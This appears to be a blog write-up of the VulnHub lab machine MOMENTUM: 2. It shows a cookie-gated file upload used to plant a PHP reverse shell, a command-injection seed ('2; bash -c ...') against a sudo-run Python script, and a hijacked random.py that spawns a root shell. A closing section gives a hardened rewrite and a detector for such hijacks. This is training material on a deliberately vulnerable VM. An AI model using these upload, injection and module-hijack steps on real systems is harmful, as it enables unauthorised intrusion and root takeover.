I was away again; but this time I didn’t even have a laptop. Still, I try to do something every day, so I did a bit of OverTheWire on my phone. Some of it is hard on a phone, where you can’t resize the terminal window to get more room, but Leviathan was doable and so I completed that. After that I got home again and did MOMENTUM: 2 from VulnHub.
Keywords: curl, bash, code review
It’s medium rated.
Ports
SSH and HTTP only.
HTTP
We need to do some enumeration here; there are a few things we need to find:
http://192.168.1.240/dashboard.html is where we can upload files,
http://192.168.1.240/owls/ is where we find our uploaded content, and
http://192.168.1.240/ajax.php.bak is where we find our code to review
The last one I found with:
feroxbuster -u http://192.168.1.240 -w /usr/share/seclists/Discovery/Web-Content/merged-file -C 403 -x php,bak --no-recursion
What’s in our code?
//The boss told me to add one more Upper Case letter at the end of the cookie
if (isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms') {
    //[+] Add if $_POST['secure'] == 'val1d'
    $valid_ext = array("pdf", "php", "txt");
}
else {
    $valid_ext = array("txt");
}
// Remember success upload returns 1
This is relatively simple. We need to set a cookie, but also figure out what its last character is, and add a new parameter to our POST request. Before finding this file I had tried to defeat the upload filtering to no avail. Considering we need that cookie and parameter, it’s no wonder.
I use Burp Suite Intruder to find the last character of the cookie - it is ‘R’. Then I construct this request:
POST /ajax.php HTTP/1.1
Host: 192.168.1.240
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136110921536555815714284481441
Content-Length: 5842
Origin: http://192.168.1.240
Connection: close
Cookie: admin=&G6u@B6uDXMq&MsR
Referer: http://192.168.1.240/dashboard.html

-----------------------------136110921536555815714284481441
Content-Disposition: form-data; name="secure"

val1d
-----------------------------136110921536555815714284481441
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
# etc
Privesc
At this point we’ve shelled the box and we get the password for our user:
www-data@momentum2:/home/athena$ ls -lash
ls -lash
total 32K
4.0K drwxr-xr-x 3 athena athena 4.0K May 27 18:26 .
4.0K drwxr-xr-x 4 root root 4.0K May 27 16:30 ..
4.0K -rw-r--r-- 1 athena athena 220 May 25 12:15 .bash_logout
4.0K -rw-r--r-- 1 athena athena 3.5K May 25 12:15 .bashrc
4.0K drwxr-xr-x 3 athena athena 4.0K May 27 16:58 .local
4.0K -rw-r--r-- 1 athena athena 807 May 25 12:15 .profile
4.0K -rw-r--r-- 1 athena athena 37 May 27 17:04 password-reminder.txt
4.0K -rw-r--r-- 1 root root 241 May 27 17:09 user.txt
www-data@momentum2:/home/athena$ cat pas
cat password-reminder.txt
password : myvulnerableapp[Asterisk]
www-data@momentum2:/home/athena$ cat us
cat user.txt
/ \
~ Momentum 2 ~ User Owned ~
\ /
---------------------------------------------------
FLAG : 4WpJT9qXoQwFGeoRoFBEJZiM2j2Ad33gWipzZkStMLHw
---------------------------------------------------
www-data@momentum2:/home/athena$
www-data@momentum2:/home/athena$ su athena
su athena
Password: myvulnerableapp*
athena@momentum2:~$ sudo -l
sudo -l
Matching Defaults entries for athena on momentum2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User athena may run the following commands on momentum2:
    (root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py
athena@momentum2:~$
How can we exploit this? Let’s inspect the code:
athena@momentum2:~$ cat /home/team-tasks/cookie-gen.py
cat /home/team-tasks/cookie-gen.py
import random
import os
import subprocess
print('~ Random Cookie Generation ~')
print('[!] for security reasons we keep logs about cookie seeds.')
chars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
seed = input("Enter the seed : ")
random.seed = seed
cookie = ''
for c in range(20):
    cookie += random.choice(chars)
print(cookie)
cmd = "echo %s >> log.txt" % seed
subprocess.Popen(cmd, shell=True)
athena@momentum2:~$
We’ve got command injection on the ‘seed’ parameter: it is pasted straight into a command string that is run with shell=True, as root, thanks to sudo. Python also puts the script’s own directory first on its module search path, so a random.py dropped into /home/team-tasks is what `import random` loads on the next sudo run. I use the injection to create that file (the injected touch runs as root, hence the chmod 777 so athena can write to it):
athena@momentum2:~$ cd /home/team-tasks
cd /home/team-tasks
athena@momentum2:/home/team-tasks$ sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
<oot /usr/bin/python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : 2; bash -c 'touch random.py && chmod 777 random.py'
2; bash -c 'touch random.py && chmod 777 random.py'
SLhHfZUPTWW$WUGLDDWO
athena@momentum2:/home/team-tasks$ 2
athena@momentum2:/home/team-tasks$ printf 'import os\n' >> random.py
printf 'import os\n' >> random.py
athena@momentum2:/home/team-tasks$ printf 'os.system("/bin/bash");\n' >> random.py
<ks$ printf 'os.system("/bin/bash");\n' >> random.py
athena@momentum2:/home/team-tasks$ sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
<oot /usr/bin/python3 /home/team-tasks/cookie-gen.py
root@momentum2:/home/team-tasks# id ; hostname ; date
id ; hostname ; date
uid=0(root) gid=0(root) groups=0(root)
momentum2
Fri 09 Jul 2021 08:16:35 AM EDT
root@momentum2:/home/team-tasks#
Boom.
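As an added example (not the VM’s own code), here is a hardened rewrite of the cookie-gen.py logic, plus a check a defender can run against a sudo-able script’s directory for planted look-alikes of standard-library modules. The function names, the temporary task directory and the `2; id` seed are constructed for the demo.

```python
import os
import random
import re
import sys
import tempfile

CHARS = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
SHELL_META = re.compile(r'[;&|`$<>\n()]')


def generate_cookie(seed, length=20):
    """Deterministic cookie from a private Random instance. The original did
    `random.seed = seed`, which overwrites the seed() function with a string
    and leaves the global generator unseeded."""
    rng = random.Random(seed)
    return ''.join(rng.choice(CHARS) for _ in range(length))


def vulnerable_log_command(seed):
    """The string the original hands to Popen(shell=True); returned, never run."""
    return "echo %s >> log.txt" % seed


def log_seed(seed, log_path):
    """Append the seed to the log with no shell at all; refuse seeds that carry
    shell metacharacters so the log stays a plain list of seeds."""
    if SHELL_META.search(seed):
        return False
    with open(log_path, 'a', encoding='utf-8') as fh:
        fh.write(seed + '\n')
    return True


def shadowed_stdlib_modules(script_dir):
    """Stems of .py files in script_dir that shadow a stdlib module. sys.path[0]
    is the script's directory, so a user-writable random.py there is what
    `import random` loads when the script runs under sudo."""
    stdlib = getattr(sys, 'stdlib_module_names', frozenset({'random', 'os', 'subprocess'}))
    return sorted(os.path.splitext(f)[0] for f in os.listdir(script_dir)
                  if f.endswith('.py') and os.path.splitext(f)[0] in stdlib)


def demo():
    """Constructed scenario: a task directory holding a planted random.py."""
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, 'random.py'), 'w').close()
        open(os.path.join(d, 'helper.py'), 'w').close()
        log = os.path.join(d, 'log.txt')
        return {'shadowed': shadowed_stdlib_modules(d),
                'injected_cmd': vulnerable_log_command('2; id'),
                'rejected': log_seed('2; id', log),
                'accepted': log_seed('2', log)}
```

The real fix on the box is the same in spirit: never build a shell command from the seed, and keep the script’s directory root-owned and not writable by the sudo-er.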